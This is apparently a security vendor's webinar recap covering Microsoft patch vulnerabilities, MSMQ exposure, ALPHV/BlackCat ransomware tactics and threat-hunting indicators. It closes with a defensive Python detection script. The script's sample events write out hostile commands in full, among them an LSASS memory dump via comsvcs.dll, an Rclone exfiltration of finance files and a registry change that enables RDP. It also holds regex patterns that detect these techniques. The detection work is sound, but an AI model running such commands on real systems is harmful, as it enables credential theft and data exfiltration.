As part of our ongoing efforts to support our clients, the Pondurance team hosts a webinar to keep clients current on the state of cybersecurity.
Over the past few months, the team discussed notable vulnerabilities and trends, provided a threat intelligence review, and explained some recent threat hunting tactics.
Vulnerabilities and trends
The Vulnerability Management Team Lead kicked off the client webinar with a look at Microsoft’s Patch Tuesday release for May 9, which addressed 38 vulnerabilities. Three of them were zero-days (publicly known or under exploitation before a patch was available): 1) an elevation of privilege vulnerability in the Win32k kernel driver that lets a local attacker gain SYSTEM privileges, 2) a Secure Boot bypass that lets an attacker install an affected boot policy, and 3) a remote code execution vulnerability in Windows Object Linking and Embedding (OLE), triggered when a victim is enticed to open a crafted email in a vulnerable version of Outlook.
The team also discussed new findings from recent vulnerability scans. In particular, threat actors have exploited a remote code execution vulnerability in the Microsoft Message Queuing (MSMQ) service, which underpins applications such as financial services, e-commerce, and sales automation software. MSMQ listens on TCP port 1801, and the vulnerable service showed up on internal vulnerability scans for almost every client in May; hosts that do not need the service should have it disabled, and the rest should be patched.
The Pondurance team recommends several scanning strategies and configuration changes to surface such vulnerabilities reliably in client networks. These include:
- Splitting workstations and servers into separate scans
- Running a discovery scan in Nexus and performing manual target discovery work
- Scanning a selected subset of assets per scan rather than hundreds of assets over several nights
- Increasing the scanning window
- Deploying multiple virtual machine scanners for internal scans
The vulnerability management team is also looking at recent ransomware cases; specifically, it is investigating internet-exposed installations of vulnerable Veritas backup software.
Threat intelligence review
The Security Operations Center (SOC) discussed recent updates to the #StopRansomware Guide, a comprehensive resource that helps businesses reduce the risk of ransomware attacks through best practices. The updates include recommendations for preventing common initial infection vectors, an expanded ransomware response checklist with threat hunting tips for detection and analysis, and recommendations covering cloud backups and zero-trust architecture, among others.
The SOC team also took an in-depth look at the BlackCat ransomware group, also known as ALPHV, whose count of observed victims continues to grow. As many as 8,300 organizations have fallen victim to ALPHV in the last 60 days, according to Recorded Future News. And if the number of victims alone is not cause for alarm, some of the ransom demands have exceeded $2 million.
In addition, the team identified the top four file hashes associated with ALPHV and noted that the hashes seen across different attacks appear to be tied together, which leads defenders to conclude that the various groups are working in unison.
“These threat actors are getting the bands together again and creating a supergroup even.” - Pondurance SOC
Recent threat hunting tactics
The Security Operations Center Team Lead continued the discussion of ALPHV, identifying potential scenarios based on the group’s known execution chains and explaining how the Pondurance team hunts for the indicators of compromise (IoCs) generated during the group’s attacks.
The Team Lead explained that the first attack method for ALPHV is exploitation of an unpatched Exchange server. The group uses a range of tactics, techniques, and procedures across the attack life cycle, which can include:
- Using net.exe to collect system and network information
- Gathering Active Directory environment information with tools such as ADRecon and AdFind
- Dumping credentials from the Local Security Authority Subsystem Service (LSASS) process
- Using the stolen credentials to move laterally and escalate privileges
- Exfiltrating data with tools such as MegaSync and Rclone
- Collecting domain configuration, intellectual property, personally identifiable information, and protected health information for double extortion (threatening to leak the data if the ransom is not paid)
A second attack method uses compromised credentials, purchased on the black market, to gain initial access to a victim’s environment. Once inside, ALPHV collects the system information it needs to move laterally through the network, dropping and installing legitimate software along the way. The threat actor then continues stealing credentials and escalating privileges. Ultimately, ALPHV deploys the BlackCat ransomware payload and demands a ransom payment.
The Pondurance team has many tactics for hunting a threat actor such as ALPHV, both proactively and retroactively. Several IoCs the team hunts for are:
- Known hashes, executables, dynamic-link libraries, and file names
- Parent-child process relationships, specifically around the AdFind tool
- Rclone executing from the command line
- Network-based signatures
- Impacket tooling running as a service on an endpoint
- Modification of firewall and remote desktop rules
- Endpoint detection and response (EDR) agent telemetry, including attempts to disable the agent
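The hunts in the list above map directly onto the execution chain described earlier (net.exe recon, AdFind/ADRecon, LSASS dumping, Impacket, Rclone, firewall and RDP changes). The following is an added example, written for this page and not Pondurance's own tooling, showing how those hunts can be expressed as rules over process-creation telemetry (the fields Sysmon Event ID 1 or an EDR process event would provide). The sample events and the IoC hash set are constructed placeholders; replace the hash set with real hashes from a threat intelligence feed.

```python
"""Hunt rules for the ALPHV/BlackCat TTPs above, run over process-creation events.
Added example; the events below are constructed and the IoC hashes are placeholders."""
import re
from dataclasses import dataclass

# Placeholder IoC set (not real ALPHV hashes); load from a threat feed in practice.
IOC_SHA256 = {"deadbeef" * 8}


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str
    sha256: str = ""


def _name(path):
    """Bare file name of a Windows path, lower-cased for matching."""
    return path.rsplit("\\", 1)[-1].lower()


# net.exe domain/group enumeration, e.g. net group "Domain Admins" /domain, net view
NET_RECON = re.compile(r"\b(?:group|user|localgroup)\b.*/domain|\bview\b", re.I)
# AdFind LDAP filter syntax (catches a renamed binary) or an ADRecon script invocation
ADFIND_ARGS = re.compile(r"-f\s+\"?\(?objectcategory=|adrecon\.ps1", re.I)
# rclone invoked from a shell even if the binary is not named rclone.exe
RCLONE_CLI = re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)
# LSASS memory dumps via comsvcs.dll MiniDump, procdump, or a dump file named after lsass
LSASS_DUMP = re.compile(r"comsvcs\.dll.*minidump|procdump.*lsass|lsass.*\.dmp", re.I)
# Impacket smbexec/wmiexec redirect output to a loopback share (\\127.0.0.1\C$\__output,
# \\127.0.0.1\ADMIN$\__<ts>) or stage commands in execute.bat
IMPACKET_OUT = re.compile(r"\\\\127\.0\.0\.1\\\w+\$\\__|execute\.bat", re.I)
# Firewall rule additions/enables and the registry switch that enables RDP
NETSH_FW = re.compile(r"advfirewall\s+firewall\s+(?:add|set)\s+rule.*(?:action=allow|enable=yes)", re.I)
RDP_REG = re.compile(r"fDenyTSConnections.*/d\s+0\b", re.I)

RULES = [
    ("net.exe domain recon", lambda e: _name(e.image) in ("net.exe", "net1.exe")
     and bool(NET_RECON.search(e.cmdline))),
    ("AdFind/ADRecon enumeration", lambda e: _name(e.image) == "adfind.exe"
     or bool(ADFIND_ARGS.search(e.cmdline))),
    ("Rclone/MegaSync exfiltration", lambda e: _name(e.image) in ("rclone.exe", "megasync.exe")
     or bool(RCLONE_CLI.search(e.cmdline))),
    ("LSASS credential dump", lambda e: bool(LSASS_DUMP.search(e.cmdline))),
    ("Impacket service/WMI execution", lambda e: _name(e.parent_image) in ("services.exe", "wmiprvse.exe")
     and bool(IMPACKET_OUT.search(e.cmdline))),
    ("Firewall/RDP rule modification", lambda e:
     (_name(e.image) == "netsh.exe" and bool(NETSH_FW.search(e.cmdline)))
     or (_name(e.image) == "reg.exe" and bool(RDP_REG.search(e.cmdline)))),
    ("Known IoC hash", lambda e: e.sha256.lower() in IOC_SHA256),
]


def hunt(events):
    """Return one finding per (event, rule) match, keeping the parent for triage."""
    hits = []
    for e in events:
        for rule, pred in RULES:
            if pred(e):
                hits.append({"rule": rule, "host": e.host, "user": e.user,
                             "image": _name(e.image), "parent": _name(e.parent_image)})
    return hits


# Constructed sample telemetry (not real client data); one benign event is included.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "CORP\\jdoe", r"C:\Windows\System32\net.exe", r"C:\Windows\System32\cmd.exe",
              'net group "Domain Admins" /domain'),
    ProcEvent("WS01", "CORP\\jdoe", r"C:\Users\Public\af.exe", r"C:\Windows\System32\cmd.exe",
              'af.exe -f "(objectcategory=person)" > ad_users.txt'),       # renamed AdFind
    ProcEvent("SRV02", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\services.exe",
              r"cmd.exe /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat"),
    ProcEvent("SRV02", "CORP\\svc_backup", r"C:\ProgramData\rclone.exe", r"C:\Windows\System32\cmd.exe",
              "rclone.exe copy D:\\Finance mega:loot --transfers 32"),
    ProcEvent("SRV02", "CORP\\svc_backup", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\l.dmp full"),
    ProcEvent("SRV02", "CORP\\svc_backup", r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ProcEvent("WS01", "CORP\\jdoe", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcEvent("WS03", "CORP\\bob", r"C:\Users\bob\Downloads\update.exe", r"C:\Windows\explorer.exe",
              "update.exe", sha256="deadbeef" * 8),
]


def run_sample():
    """Run the rules over the constructed events; returns the findings list."""
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for h in run_sample():
        print(f"{h['host']:6} {h['rule']:32} {h['parent']} -> {h['image']} ({h['user']})")
```

The AdFind and Rclone rules deliberately match on argument syntax rather than only on the binary name, since renaming the executable is the first thing an affiliate does; the parent process is kept in every finding because an LDAP dump spawned from services.exe or wmiprvse.exe is a much stronger signal than the same command from an administrator's interactive shell.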